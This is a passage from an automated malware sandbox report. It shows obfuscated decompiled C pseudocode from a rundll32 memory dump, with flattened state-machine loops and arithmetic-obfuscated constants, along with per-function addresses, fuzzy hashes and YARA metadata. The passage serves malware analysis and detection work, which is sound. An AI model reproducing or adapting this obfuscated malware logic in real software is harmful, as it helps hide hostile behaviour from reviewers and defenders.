				_v1640 = _v1640 | 0xf246f931;
				_v1640 = _v1640 ^ 0xf242cc5d;
				_v1628 = 0xa390c8;
				_v1628 = _v1628 << 0xf;
				_v1628 = _v1628 ^ 0x3ac7d651;
				_v1628 = _v1628 ^ 0xf2afedad;
				_v1652 = 0x2d980b;
				_v1652 = _v1652 * 0x71;
				_v1652 = _v1652 * 0x17;
				_v1652 = _v1652 ^ 0x28f4da4d;
				_v1652 = _v1652 ^ 0xe6141d35;
				_v1636 = 0x37785c;
				_v1636 = _v1636 + 0xffffcffd;
				_v1636 = _v1636 ^ 0x6b7d5c73;
				_v1636 = _v1636 ^ 0x6b457d84;
				_v1616 = 0xb1620;
				_v1616 = _v1616 << 0x10;
				_v1616 = _v1616 ^ 0x162b8e46;
				_v1632 = 0x4c47;
				_v1632 = _v1632 + 0xffffc0f0;
				_v1632 = _v1632 + 0xffffd3bf;
				_v1632 = _v1632 ^ 0xfff44e1b;
				_v1664 = 0xa6b80c;
				_v1664 = _v1664 + 0xf763;
				_v1664 = _v1664 * 0x6e;
				_v1664 = _v1664 / _t276;
				_v1664 = _v1664 ^ 0x00b9c638;
				_v1600 = 0xaa0054;
				_v1600 = _v1600 ^ 0xf2e3595a;
				_v1600 = _v1600 ^ 0xf24e3ce3;
				_v1608 = 0x669547;
				_v1608 = _v1608 + 0xe3ee;
				_v1608 = _v1608 ^ 0x0066aeed;
				_v1656 = 0xf50b8d;
				_v1656 = _v1656 + 0xffffe5b9;
				_v1656 = _v1656 * 0x19;
				_v1656 = _v1656 * 0x2c;
				_v1656 = _v1656 ^ 0x1c789090;
				_v1576 = 0xf13773;
				_v1576 = _v1576 | 0xffe45fc0;
				_v1576 = _v1576 ^ 0xfffeb9af;
				_v1624 = 0xc714fc;
				_v1624 = _v1624 << 7;
				_v1624 = _v1624 * 0x4d;
				_v1624 = _v1624 ^ 0xf0acb0c0;
				_v1584 = 0x43b9ac;
				_v1584 = _v1584 + 0xfffff1bc;
				_v1584 = _v1584 ^ 0x004aa621;
				_v1592 = 0x5bf493;
				_t258 = _v1592 * 0x43;
				_v1592 = _t258;
				_v1592 = _v1592 ^ 0x181e9f62;
				while(_t304 != 0x2953b22) {
					if(_t304 == 0x422d362) {
						_t304 = 0xe704baa;
						continue;
					} else {
						_t312 = _t304 - 0xe704baa;
						if(_t304 != 0xe704baa) {
							L8:
							__eflags = _t304 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E008306A8(_t276, _v1644, _t312, _v1612, _v1580,  &_v1560);
							 *((short*)(E008243A8(_v1604,  &_v1560, _v1660, _v1620))) = 0;
							E00817A50(_v1596,  &_v520, _t312, _v1568);
							_push(_v1648);
							_push(_v1572);
							_push(0x1000183c);
							E0081DBCE(E00819F66(_v1564, _v1588, _t312), _t312, _v1668,  &_v1560, _v1564, _v1640, _v1628, _v1652, _v1636,  &_v520);
							E0081A203(_v1616, _v1632, _v1664, _t264);
							_t276 = _v1600;
							_t258 = E0082B78F(_t276,  &_v1040, _t303, _v1608);
							_t307 =  &(_t307[0x15]);
							if(_t258 != 0) {
								_t304 = 0x2953b22;
								continue;
							}
						}
					}
					return _t258;
				}
				_push(_v1592);
				_push(_v1584);
				_push(_v1624);
				_push( &_v1040);
				_push(0);
				_push(_v1576);
				_push(_t276);
				_push(0);
				_t276 = 0;
				__eflags = 0;
				_t258 = E00818B00(0, _v1656, 0);
				_t307 =  &(_t307[8]);
				_t304 = 0x740d40c;
				goto L8;
			}











































                                                                                                                      0x00817cf4
                                                                                                                      0x00817cfa
                                                                                                                      0x00817d0d
                                                                                                                      0x00817d11
                                                                                                                      0x00817d13
                                                                                                                      0x00817d18
                                                                                                                      0x00817d23
                                                                                                                      0x00817d28
                                                                                                                      0x00817d2e
                                                                                                                      0x00817d36
                                                                                                                      0x00817d3e
                                                                                                                      0x00817d43
                                                                                                                      0x00817d4b
                                                                                                                      0x00817d53
                                                                                                                      0x00817d5b
                                                                                                                      0x00817d63
                                                                                                                      0x00817d6b
                                                                                                                      0x00817d73
                                                                                                                      0x00817d7b
                                                                                                                      0x00817d87
                                                                                                                      0x00817d8c
                                                                                                                      0x00817d92
                                                                                                                      0x00817d9c
                                                                                                                      0x00817d9f
                                                                                                                      0x00817da3
                                                                                                                      0x00817dab
                                                                                                                      0x00817db3
                                                                                                                      0x00817dbb
                                                                                                                      0x00817dc3
                                                                                                                      0x00817dd3
                                                                                                                      0x00817dd7
                                                                                                                      0x00817ddf
                                                                                                                      0x00817de7
                                                                                                                      0x00817def
                                                                                                                      0x00817df7
                                                                                                                      0x00817e03
                                                                                                                      0x00817e08
                                                                                                                      0x00817e0e
                                                                                                                      0x00817e16
                                                                                                                      0x00817e23
                                                                                                                      0x00817e24
                                                                                                                      0x00817e28
                                                                                                                      0x00817e30
                                                                                                                      0x00817e38
                                                                                                                      0x00817e40
                                                                                                                      0x00817e48
                                                                                                                      0x00817e50
                                                                                                                      0x00817e55
                                                                                                                      0x00817e5a
                                                                                                                      0x00817e5f
                                                                                                                      0x00817e67
                                                                                                                      0x00817e6f
                                                                                                                      0x00817e74
                                                                                                                      0x00817e78
                                                                                                                      0x00817e7e
                                                                                                                      0x00817e82
                                                                                                                      0x00817e86
                                                                                                                      0x00817e90
                                                                                                                      0x00817ea9
                                                                                                                      0x00817eaa
                                                                                                                      0x00817eae
                                                                                                                      0x00817eb3
                                                                                                                      0x00817ebb
                                                                                                                      0x00817ec3
                                                                                                                      0x00817ecb
                                                                                                                      0x00817ed0
                                                                                                                      0x00817ed8
                                                                                                                      0x00817ee0
                                                                                                                      0x00817eed
                                                                                                                      0x00817ef6
                                                                                                                      0x00817efa
                                                                                                                      0x00817f02
                                                                                                                      0x00817f0a
                                                                                                                      0x00817f12
                                                                                                                      0x00817f1a
                                                                                                                      0x00817f22
                                                                                                                      0x00817f2a
                                                                                                                      0x00817f32
                                                                                                                      0x00817f37
                                                                                                                      0x00817f3f
                                                                                                                      0x00817f47
                                                                                                                      0x00817f4f
                                                                                                                      0x00817f57
                                                                                                                      0x00817f5f
                                                                                                                      0x00817f67
                                                                                                                      0x00817f74
                                                                                                                      0x00817f7e
                                                                                                                      0x00817f82
                                                                                                                      0x00817f8a
                                                                                                                      0x00817f92
                                                                                                                      0x00817f9a
                                                                                                                      0x00817fa2
                                                                                                                      0x00817faa
                                                                                                                      0x00817fb2
                                                                                                                      0x00817fba
                                                                                                                      0x00817fc2
                                                                                                                      0x00817fcf
                                                                                                                      0x00817fd8
                                                                                                                      0x00817fdc
                                                                                                                      0x00817fe4
                                                                                                                      0x00817fec
                                                                                                                      0x00817ff4
                                                                                                                      0x00817ffc
                                                                                                                      0x00818004
                                                                                                                      0x0081800e
                                                                                                                      0x00818012
                                                                                                                      0x0081801a
                                                                                                                      0x00818022
                                                                                                                      0x0081802a
                                                                                                                      0x00818032
                                                                                                                      0x0081803a
                                                                                                                      0x0081803f
                                                                                                                      0x00818043
                                                                                                                      0x0081804b
                                                                                                                      0x00818059
                                                                                                                      0x00818144
                                                                                                                      0x00000000
                                                                                                                      0x0081805f
                                                                                                                      0x0081805f
                                                                                                                      0x00818061
                                                                                                                      0x0081817e
                                                                                                                      0x0081817e
                                                                                                                      0x00818184
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00818067
                                                                                                                      0x00818078
                                                                                                                      0x008180a5
                                                                                                                      0x008180ac
                                                                                                                      0x008180b1
                                                                                                                      0x008180b5
                                                                                                                      0x008180ca
                                                                                                                      0x00818107
                                                                                                                      0x00818119
                                                                                                                      0x00818122
                                                                                                                      0x00818131
                                                                                                                      0x00818136
                                                                                                                      0x0081813b
                                                                                                                      0x0081813d
                                                                                                                      0x00000000
                                                                                                                      0x0081813d
                                                                                                                      0x0081813b
                                                                                                                      0x00818061
                                                                                                                      0x00818194
                                                                                                                      0x00818194
                                                                                                                      0x0081814b
                                                                                                                      0x00818156
                                                                                                                      0x0081815a
                                                                                                                      0x0081815e
                                                                                                                      0x0081815f
                                                                                                                      0x00818161
                                                                                                                      0x0081816c
                                                                                                                      0x0081816d
                                                                                                                      0x0081816f
                                                                                                                      0x0081816f
                                                                                                                      0x00818171
                                                                                                                      0x00818176
                                                                                                                      0x00818179
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <]$GL$NjZ$T$j_$s\}k
                                                                                                                      • API String ID: 0-1588241565
                                                                                                                      • Opcode ID: b00b51148bd1393473e6693032dd293d1e4f5da7aeb51f141611b5ebc4386db2
                                                                                                                      • Instruction ID: 309d609c57374ec08e0b15776c19bccc84e62b96672cc91d70b4da23161b678c
                                                                                                                      • Opcode Fuzzy Hash: b00b51148bd1393473e6693032dd293d1e4f5da7aeb51f141611b5ebc4386db2
                                                                                                                      • Instruction Fuzzy Hash: 5FC1FF724083419FC368CF25C58A94BFBE5FBC4708F008A1DF5A696260D7B59A0ACF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 008164ED Relevance: 7.7, Strings: 6, Instructions: 219COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E008164ED() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _t202;
				signed int _t203;
				void* _t204;
				void* _t218;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t246;
				signed int* _t248;
				void* _t251;

				_t248 =  &_v612;
				_v540 = 0xdad4cc;
				_v540 = _v540 ^ 0x94191629;
				_t218 = 0x6f2f9f8;
				_v540 = _v540 ^ 0x94c3c2f9;
				_v544 = 0x76e0f0;
				_v544 = _v544 << 0x10;
				_v544 = _v544 ^ 0xe0f00029;
				_v536 = 0x3bc67a;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x000f0383;
				_v568 = 0x8bde3b;
				_v568 = _v568 + 0xffff2322;
				_v568 = _v568 ^ 0x008d993e;
				_v596 = 0x92619;
				_v596 = _v596 ^ 0xd159791b;
				_v596 = _v596 + 0xffff3449;
				_v596 = _v596 | 0x988058a4;
				_v596 = _v596 ^ 0xd9ccc0e1;
				_v608 = 0xa06713;
				_t241 = 0x29;
				_v608 = _v608 / _t241;
				_v608 = _v608 ^ 0x6a345d45;
				_t246 = 0;
				_v608 = _v608 << 0xe;
				_v608 = _v608 ^ 0xed3298df;
				_v576 = 0x1c835f;
				_v576 = _v576 ^ 0xdf607740;
				_v576 = _v576 >> 0xb;
				_v576 = _v576 ^ 0x0012ec93;
				_v584 = 0x7ddda5;
				_t242 = 0x76;
				_v584 = _v584 / _t242;
				_v584 = _v584 | 0x464a7126;
				_v584 = _v584 ^ 0x4642215f;
				_v548 = 0x20374d;
				_t243 = 0x71;
				_v548 = _v548 * 0x6c;
				_v548 = _v548 ^ 0x0d9d239d;
				_v528 = 0x9116;
				_v528 = _v528 ^ 0x0b2a50da;
				_v528 = _v528 ^ 0x0b2b7a92;
				_v600 = 0xee9b3a;
				_v600 = _v600 | 0x1ae7cac3;
				_v600 = _v600 + 0x2aec;
				_v600 = _v600 | 0xe5d5fb71;
				_v600 = _v600 ^ 0xfffe899a;
				_v556 = 0x2fd7b1;
				_v556 = _v556 / _t243;
				_v556 = _v556 ^ 0x0001ae08;
				_v552 = 0xd06bd7;
				_v552 = _v552 + 0x9aba;
				_v552 = _v552 ^ 0x00dba68b;
				_v560 = 0x3f6698;
				_v560 = _v560 ^ 0x9e976c20;
				_v560 = _v560 ^ 0x9ea088a0;
				_v564 = 0xf04caf;
				_v564 = _v564 << 0xc;
				_v564 = _v564 ^ 0x04c86801;
				_v532 = 0x4abe1e;
				_v532 = _v532 + 0xffff7e54;
				_v532 = _v532 ^ 0x0047677c;
				_v592 = 0xfc3d76;
				_v592 = _v592 >> 4;
				_t244 = 0x67;
				_t245 = _v524;
				_v592 = _v592 / _t244;
				_v592 = _v592 ^ 0x0e63bcd1;
				_v592 = _v592 ^ 0x0e6c0c0a;
				_v580 = 0x87074e;
				_v580 = _v580 + 0x3b8f;
				_v580 = _v580 + 0xffffa265;
				_v580 = _v580 ^ 0x008cb1a6;
				_v588 = 0xe717aa;
				_v588 = _v588 | 0xfff18f7b;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 ^ 0x001226f1;
				_v604 = 0x61f630;
				_v604 = _v604 | 0xec5f2186;
				_v604 = _v604 ^ 0x97c62f9e;
				_v604 = _v604 ^ 0x80f94e8c;
				_v604 = _v604 ^ 0xfb4d53d4;
				_v612 = 0x890e92;
				_v612 = _v612 >> 9;
				_v612 = _v612 + 0xf9d4;
				_v612 = _v612 + 0xffff7e3c;
				_v612 = _v612 ^ 0x000167a4;
				_v572 = 0xa3f922;
				_v572 = _v572 << 1;
				_v572 = _v572 + 0x9b39;
				_v572 = _v572 ^ 0x014464a5;
				goto L1;
				do {
					while(1) {
						L1:
						_t251 = _t218 - 0xaf66d96;
						if(_t251 > 0) {
							break;
						}
						if(_t251 == 0) {
							_push(_t218);
							_t176 =  *0x1002520c + 8; // 0x681b7559
							_t203 = E0081DE7B(_t176, _v552, _v524, _t218, _v560, _v564, _v532);
							_t248 =  &(_t248[7]);
							_t218 = 0xbcbad55;
							__eflags = _t203;
							_t204 = 1;
							_t246 =  ==  ? _t204 : _t246;
							continue;
						}
						if(_t218 == 0x1700698) {
							E0082DA89(_v548, _v528, _v600, _t245, _v556);
							_t248 =  &(_t248[3]);
							L9:
							_t218 = 0xaf66d96;
							continue;
						}
						if(_t218 == 0x4f7449d) {
							_v524 = _v540;
							goto L9;
						}
						if(_t218 == 0x51416c3) {
							E008306A8(_t218, _v592, __eflags, _v580, _v588,  &_v520);
							 *((intOrPtr*)( *0x1002520c + 4)) = E00816A77( &_v520, _v604, _v612, _v572);
							L23:
							return _t246;
						}
						if(_t218 != 0x6f2f9f8) {
							goto L20;
						}
						_push(_t218);
						_push(_t218);
						 *0x1002520c = E00822912(0x444);
						_t218 = 0xcc58939;
					}
					__eflags = _t218 - 0xbcbad55;
					if(_t218 == 0xbcbad55) {
						E0081DC6A();
						_t218 = 0x51416c3;
						goto L20;
					}
					__eflags = _t218 - 0xcc58939;
					if(_t218 == 0xcc58939) {
						_t202 = E0081DF36(_v576, _v584, _t218, _v536);
						_t245 = _t202;
						_t248 =  &(_t248[3]);
						__eflags = _t202;
						if(__eflags == 0) {
							_t218 = 0x4f7449d;
						} else {
							 *((intOrPtr*)( *0x1002520c + 0x438)) = 1;
							_t218 = 0xdbc7fda;
						}
						goto L1;
					}
					__eflags = _t218 - 0xdbc7fda;
					if(__eflags != 0) {
						goto L20;
					}
					_t218 = 0x1700698;
					_v524 = _v544;
					goto L1;
					L20:
					__eflags = _t218 - 0xee3620e;
				} while (__eflags != 0);
				goto L23;
			}






































                                                                                                                      0x008164ed
                                                                                                                      0x008164f3
                                                                                                                      0x008164fd
                                                                                                                      0x00816505
                                                                                                                      0x0081650a
                                                                                                                      0x00816512
                                                                                                                      0x0081651a
                                                                                                                      0x0081651f
                                                                                                                      0x00816527
                                                                                                                      0x0081652f
                                                                                                                      0x00816534
                                                                                                                      0x0081653c
                                                                                                                      0x00816544
                                                                                                                      0x0081654c
                                                                                                                      0x00816554
                                                                                                                      0x0081655c
                                                                                                                      0x00816564
                                                                                                                      0x0081656c
                                                                                                                      0x00816574
                                                                                                                      0x0081657c
                                                                                                                      0x0081658e
                                                                                                                      0x00816593
                                                                                                                      0x00816599
                                                                                                                      0x008165a1
                                                                                                                      0x008165a3
                                                                                                                      0x008165a8
                                                                                                                      0x008165b0
                                                                                                                      0x008165b8
                                                                                                                      0x008165c0
                                                                                                                      0x008165c5
                                                                                                                      0x008165cd
                                                                                                                      0x008165d9
                                                                                                                      0x008165de
                                                                                                                      0x008165e4
                                                                                                                      0x008165ec
                                                                                                                      0x008165f4
                                                                                                                      0x00816601
                                                                                                                      0x00816602
                                                                                                                      0x00816606
                                                                                                                      0x0081660e
                                                                                                                      0x00816616
                                                                                                                      0x0081661e
                                                                                                                      0x00816626
                                                                                                                      0x0081662e
                                                                                                                      0x00816636
                                                                                                                      0x0081663e
                                                                                                                      0x00816646
                                                                                                                      0x0081664e
                                                                                                                      0x0081665c
                                                                                                                      0x00816660
                                                                                                                      0x00816668
                                                                                                                      0x00816670
                                                                                                                      0x00816678
                                                                                                                      0x00816680
                                                                                                                      0x00816688
                                                                                                                      0x00816690
                                                                                                                      0x00816698
                                                                                                                      0x008166a0
                                                                                                                      0x008166a5
                                                                                                                      0x008166ad
                                                                                                                      0x008166b5
                                                                                                                      0x008166bd
                                                                                                                      0x008166c5
                                                                                                                      0x008166cd
                                                                                                                      0x008166df
                                                                                                                      0x008166e2
                                                                                                                      0x008166eb
                                                                                                                      0x008166ef
                                                                                                                      0x008166f7
                                                                                                                      0x008166ff
                                                                                                                      0x00816707
                                                                                                                      0x0081670f
                                                                                                                      0x00816717
                                                                                                                      0x0081671f
                                                                                                                      0x00816727
                                                                                                                      0x0081672f
                                                                                                                      0x00816734
                                                                                                                      0x0081673c
                                                                                                                      0x00816744
                                                                                                                      0x0081674c
                                                                                                                      0x00816754
                                                                                                                      0x0081675c
                                                                                                                      0x00816764
                                                                                                                      0x0081676c
                                                                                                                      0x00816771
                                                                                                                      0x00816779
                                                                                                                      0x00816781
                                                                                                                      0x00816789
                                                                                                                      0x00816791
                                                                                                                      0x00816795
                                                                                                                      0x0081679d
                                                                                                                      0x0081679d
                                                                                                                      0x008167a5
                                                                                                                      0x008167a5
                                                                                                                      0x008167a5
                                                                                                                      0x008167a5
                                                                                                                      0x008167a7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x008167ad
                                                                                                                      0x00816820
                                                                                                                      0x0081683c
                                                                                                                      0x0081683f
                                                                                                                      0x00816844
                                                                                                                      0x00816847
                                                                                                                      0x0081684c
                                                                                                                      0x00816850
                                                                                                                      0x00816851
                                                                                                                      0x00000000
                                                                                                                      0x00816851
                                                                                                                      0x008167b5
                                                                                                                      0x00816816
                                                                                                                      0x0081681b
                                                                                                                      0x00816801
                                                                                                                      0x00816801
                                                                                                                      0x00000000
                                                                                                                      0x00816801
                                                                                                                      0x008167b9
                                                                                                                      0x008167fd
                                                                                                                      0x00000000
                                                                                                                      0x008167fd
                                                                                                                      0x008167c1
                                                                                                                      0x008168e6
                                                                                                                      0x00816909
                                                                                                                      0x0081690d
                                                                                                                      0x00816918
                                                                                                                      0x00816918
                                                                                                                      0x008167cd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x008167df
                                                                                                                      0x008167e0
                                                                                                                      0x008167ed
                                                                                                                      0x008167f2
                                                                                                                      0x008167f2
                                                                                                                      0x00816859
                                                                                                                      0x0081685f
                                                                                                                      0x008168bd
                                                                                                                      0x008168c2
                                                                                                                      0x00000000
                                                                                                                      0x008168c2
                                                                                                                      0x00816861
                                                                                                                      0x00816867
                                                                                                                      0x00816890
                                                                                                                      0x00816895
                                                                                                                      0x00816897
                                                                                                                      0x0081689a
                                                                                                                      0x0081689c
                                                                                                                      0x008168b6
                                                                                                                      0x0081689e
                                                                                                                      0x008168a6
                                                                                                                      0x008168ac
                                                                                                                      0x008168ac
                                                                                                                      0x00000000
                                                                                                                      0x0081689c
                                                                                                                      0x00816869
                                                                                                                      0x0081686f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00816875
                                                                                                                      0x0081687a
                                                                                                                      0x00000000
                                                                                                                      0x008168c7
                                                                                                                      0x008168c7
                                                                                                                      0x008168c7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$E]4j$M7 $_!BF$|gG$*
                                                                                                                      • API String ID: 0-1206799572
                                                                                                                      • Opcode ID: bfbaff5646489ae7fac545b187a43203f066b75ffc2a216d9bccf810a554567d
                                                                                                                      • Instruction ID: cadd7a099aab494273c31e5c510634d6161f91a731e29203e44eb69fea39cab2
                                                                                                                      • Opcode Fuzzy Hash: bfbaff5646489ae7fac545b187a43203f066b75ffc2a216d9bccf810a554567d
                                                                                                                      • Instruction Fuzzy Hash: CBA132B15083819FD768CF24D48A81BBBE5FFC5358F20891DF69686260E3B18999CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00824440 Relevance: 7.7, Strings: 6, Instructions: 214COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00824440(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t222;
				signed int _t224;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t261;
				void* _t262;
				signed int* _t264;
				signed int* _t265;

				_t264 =  &_v80;
				_v64 = 0xca2d1a;
				_v64 = _v64 + 0xffff463a;
				_v64 = _v64 + 0xffffa2b5;
				_v64 = _v64 + 0xffffe441;
				_v64 = _v64 ^ 0x00ce8887;
				_v68 = 0xe757b6;
				_t261 = __edx;
				_t227 = __ecx;
				_t262 = 0xd46e588;
				_t229 = 0x7b;
				_v68 = _v68 / _t229;
				_v68 = _v68 | 0x2f3c6c23;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0xe7b70971;
				_v72 = 0xa66d67;
				_v72 = _v72 + 0xffff9e81;
				_v72 = _v72 + 0xffffa01d;
				_v72 = _v72 + 0xd858;
				_v72 = _v72 ^ 0x00aeb203;
				_v76 = 0xda65d9;
				_v76 = _v76 | 0x06c15440;
				_v76 = _v76 + 0x3ac0;
				_t230 = 0x31;
				_v76 = _v76 * 0x17;
				_v76 = _v76 ^ 0x9dbea6d5;
				_v28 = 0xef7021;
				_v28 = _v28 + 0xc1df;
				_v28 = _v28 ^ 0x38dac4ec;
				_v28 = _v28 ^ 0x38291ca9;
				_v56 = 0xd77e5;
				_v56 = _v56 | 0x9f6ff94e;
				_v56 = _v56 / _t230;
				_v56 = _v56 ^ 0x034debba;
				_v32 = 0x5c0433;
				_t231 = 0x4c;
				_v32 = _v32 / _t231;
				_t232 = 0x38;
				_v32 = _v32 * 9;
				_v32 = _v32 ^ 0x000ec3b0;
				_v60 = 0x6ca766;
				_v60 = _v60 + 0x1f13;
				_v60 = _v60 * 0x1b;
				_v60 = _v60 << 0xb;
				_v60 = _v60 ^ 0xc778512f;
				_v12 = 0x6aa94;
				_v12 = _v12 + 0x5212;
				_v12 = _v12 ^ 0x000734b5;
				_v48 = 0xd6268c;
				_v48 = _v48 / _t232;
				_t233 = 0x26;
				_v48 = _v48 / _t233;
				_v48 = _v48 + 0x646;
				_v48 = _v48 ^ 0x000e3e3b;
				_v52 = 0x57df31;
				_t234 = 0x5e;
				_v52 = _v52 / _t234;
				_v52 = _v52 >> 4;
				_v52 = _v52 << 0x10;
				_v52 = _v52 ^ 0x0ef79a5c;
				_v8 = 0x5569b0;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x000ef288;
				_v44 = 0x5fa9ce;
				_v44 = _v44 + 0xffff7bdd;
				_v44 = _v44 << 1;
				_t235 = 0x65;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x000c777c;
				_v36 = 0x515ebf;
				_v36 = _v36 | 0x64797e59;
				_v36 = _v36 ^ 0x4915d5d4;
				_v36 = _v36 ^ 0x2d62d183;
				_v16 = 0xf90c33;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 ^ 0x1c3bb4ce;
				_v80 = 0x303e6a;
				_v80 = _v80 + 0xaf21;
				_v80 = _v80 ^ 0x45872c25;
				_v80 = _v80 + 0xffff3867;
				_v80 = _v80 ^ 0x45bdee21;
				_v20 = 0xb8b4ba;
				_v20 = _v20 + 0x3a99;
				_v20 = _v20 ^ 0x00b083c3;
				_v40 = 0xb582c8;
				_v40 = _v40 + 0x432d;
				_v40 = _v40 | 0xfff7ef9a;
				_v40 = _v40 ^ 0xfff9a351;
				_v24 = 0x3e85d;
				_v24 = _v24 * 0x1b;
				_v24 = _v24 + 0xffffd227;
				_v24 = _v24 ^ 0x006c1bcc;
				_v4 = 0x28c504;
				_v4 = _v4 + 0xffffee75;
				_v4 = _v4 ^ 0x002a9648;
				do {
					while(_t262 != 0x8d90b87) {
						if(_t262 == 0x991fac7) {
							return E0081EC8A(_v40, _v24, _v4,  *(_t261 + 0x30));
						}
						if(_t262 == 0xa3f1429) {
							_push(_t235);
							_t224 = E00828171(_v64, _v68, __eflags, _v72, _v76, _t227);
							_t265 =  &(_t264[4]);
							 *(_t261 + 0x30) = _t224;
							__eflags = _t224;
							if(_t224 != 0) {
								E0081E205(_v56, _v32, _v60, _t224, _t224);
								_t235 =  *(_t261 + 0x30);
								E0082DB13(_t235, _v12, _v48, _v52);
								_t264 =  &(_t265[6]);
								_t262 = 0x8d90b87;
								continue;
							}
						} else {
							if(_t262 == 0xd46e588) {
								_t262 = 0xa3f1429;
								continue;
							} else {
								if(_t262 != 0xf9322b8) {
									goto L14;
								} else {
									_t235 = 0x10002f34;
									_t224 = E008242FF(0x10002f34, _v36, 0x10002f34, 0x10002f34, _v16, _v80, 0x10002f34, _v20, _t261);
									_t264 =  &(_t264[8]);
									 *(_t261 + 0x24) = _t224;
									if(_t224 == 0) {
										_t262 = 0x991fac7;
										continue;
									}
								}
							}
						}
						return _t224;
						L18:
					}
					_t235 = _v8;
					_t222 = E00821FDE(_t235,  *(_t261 + 0x30), _v44);
					_t264 =  &(_t264[1]);
					 *(_t261 + 0xc) = _t222;
					__eflags = _t222;
					if(__eflags == 0) {
						_t262 = 0x991fac7;
						goto L14;
					} else {
						_t262 = 0xf9322b8;
						continue;
					}
					goto L18;
					L14:
					__eflags = _t262 - 0x74fce14;
				} while (__eflags != 0);
				return _t224;
			}





































                                                                                                                      0x00824440
                                                                                                                      0x00824443
                                                                                                                      0x0082444b
                                                                                                                      0x00824453
                                                                                                                      0x0082445b
                                                                                                                      0x00824463
                                                                                                                      0x0082446b
                                                                                                                      0x0082447b
                                                                                                                      0x0082447d
                                                                                                                      0x00824483
                                                                                                                      0x00824488
                                                                                                                      0x0082448d
                                                                                                                      0x00824493
                                                                                                                      0x0082449b
                                                                                                                      0x008244a0
                                                                                                                      0x008244a8
                                                                                                                      0x008244b0
                                                                                                                      0x008244b8
                                                                                                                      0x008244c0
                                                                                                                      0x008244c8
                                                                                                                      0x008244d0
                                                                                                                      0x008244d8
                                                                                                                      0x008244e0
                                                                                                                      0x008244ed
                                                                                                                      0x008244f0
                                                                                                                      0x008244f4
                                                                                                                      0x008244fc
                                                                                                                      0x00824504
                                                                                                                      0x0082450c
                                                                                                                      0x00824514
                                                                                                                      0x0082451c
                                                                                                                      0x00824524
                                                                                                                      0x00824534
                                                                                                                      0x00824538
                                                                                                                      0x00824540
                                                                                                                      0x0082454c
                                                                                                                      0x00824551
                                                                                                                      0x0082455c
                                                                                                                      0x0082455f
                                                                                                                      0x00824563
                                                                                                                      0x0082456b
                                                                                                                      0x00824573
                                                                                                                      0x00824580
                                                                                                                      0x00824584
                                                                                                                      0x00824589
                                                                                                                      0x00824591
                                                                                                                      0x00824599
                                                                                                                      0x008245a1
                                                                                                                      0x008245a9
                                                                                                                      0x008245b9
                                                                                                                      0x008245c1
                                                                                                                      0x008245c4
                                                                                                                      0x008245c8
                                                                                                                      0x008245d0
                                                                                                                      0x008245d8
                                                                                                                      0x008245e8
                                                                                                                      0x008245ed
                                                                                                                      0x008245f3
                                                                                                                      0x008245fd
                                                                                                                      0x00824602
                                                                                                                      0x0082460a
                                                                                                                      0x00824612
                                                                                                                      0x00824617
                                                                                                                      0x0082461f
                                                                                                                      0x00824627
                                                                                                                      0x0082462f
                                                                                                                      0x00824637
                                                                                                                      0x0082463a
                                                                                                                      0x0082463e
                                                                                                                      0x00824646
                                                                                                                      0x0082464e
                                                                                                                      0x00824656
                                                                                                                      0x0082465e
                                                                                                                      0x00824666
                                                                                                                      0x00824673
                                                                                                                      0x00824677
                                                                                                                      0x0082467f
                                                                                                                      0x00824687
                                                                                                                      0x0082468f
                                                                                                                      0x00824697
                                                                                                                      0x0082469f
                                                                                                                      0x008246a7
                                                                                                                      0x008246af
                                                                                                                      0x008246b7
                                                                                                                      0x008246bf
                                                                                                                      0x008246c7
                                                                                                                      0x008246cf
